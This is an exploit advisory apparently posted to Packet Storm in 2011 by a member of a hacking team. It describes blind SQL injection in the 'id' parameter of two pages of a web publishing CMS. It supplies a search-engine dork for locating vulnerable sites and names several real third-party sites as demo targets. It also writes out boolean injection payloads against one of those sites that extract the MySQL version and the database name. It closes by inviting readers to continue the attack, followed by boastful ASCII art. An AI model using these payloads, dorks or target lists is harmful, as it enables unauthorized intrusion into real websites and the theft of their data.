Publishing Technology Blind SQL Injection

2011-04-25T00:00:00
ID PACKETSTORM:100822
Type packetstorm
Reporter KnocKout
Modified 2011-04-25T00:00:00

Description

                                        
                                            `=========================================================  
Publishing technology <= BLIND SQL Injection Vulnerabilities  
===========================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KnocKout member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com  
[~] Reference : http://h4x0resec.blogspot.com  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Publishing technology  
|~Price : N/A  
|~Version : N/A  
|~Software: www.publishingtechnology.com  
|~Vulnerability Style : SQL Injection  
|~Vulnerability Dir : /  
|~Google Keyword : "Powered by Publishing technology AS"  
|[~]Date : "24.04.2011"  
|[~]Tested on :  
Web Server: Microsoft-IIS/6.0  
Powered-by: ASP.NET  
DB Server: MySQL >=5  
----------------------------------------------------------  
Details.asp in 'id' Functions Not Security  
CollectionContent.asp 'id' Functions Not Security  
  
-- Demos.  
http://www.la4o.net/Details.asp?id=4   
http://www.studiemotet.no/details.asp?id=120   
http://www.lesliedowney.no/CollectionContent.asp?id=24   
http://lesliedowney.no/CollectionContent.asp?id=24  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
|{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}|  
  
Example  
  
Mysql Version?  
SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=4 {FALSE}   
SQL Injecting Retry : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=5 {TRUE}  
  
Database name?  
SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and lenght((database()))<=6 and 'Inj3ct0r'='Inj3ct0r'  
Mysql Writes : [MySQL][ODBC 3.51 Driver][mysqld-5.0.17]FUNCTION leslie.lenght does not exist  
Database Name Found! : "leslie"  
  
  
the rest is up to you exploit.  
  
================================================================  
Got a present!! FOR EXPLOIT-DB Lamers.. ::):):):)  
  
............../'' )  
...........,/¯../  
........../..../  
.../´¯/'...'/´¯¯`•¸  
./'/.../..../......./¨¯ \  
('(...´...´.... ¯~/'...' )  
.\.................'..... /  
..'\'...\.......... _.•´  
....\..............(  
.....\........   
---------------------------------------------------------------------  
  
.__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \   
| Y \/ ^ /> <\ \_/ \ | \/\ ___/   
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/   
_____________________________   
/ _____/\_ _____/\_ ___ \   
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
&  
  
__ ____/___ __ \___ |_ \/ /___ / / /___ |___ __/___ /  
_ / __ __ /_/ /__ /| |__ / __ /_/ / __ /| |__ / __ /   
/ /_/ / _ _, _/ _ ___ |_ / _ __ / _ ___ |_ / _ /__  
\____/ /_/ |_| /_/ |_|/_/ /_/ /_/ /_/ |_|/_/ /____/   
  
_____   
__________ /_______ _________________  
__ ___/_ __/_ __ `/__ ___/__ ___/  
_(__ ) / /_ / /_/ / _ / _(__ )   
/____/ \__/ \__,_/ /_/ /____/   
  
KaCaK - MUS4LLAT - ameN - KnocKout - TechnicaL - Neuromancer - MahseN   
`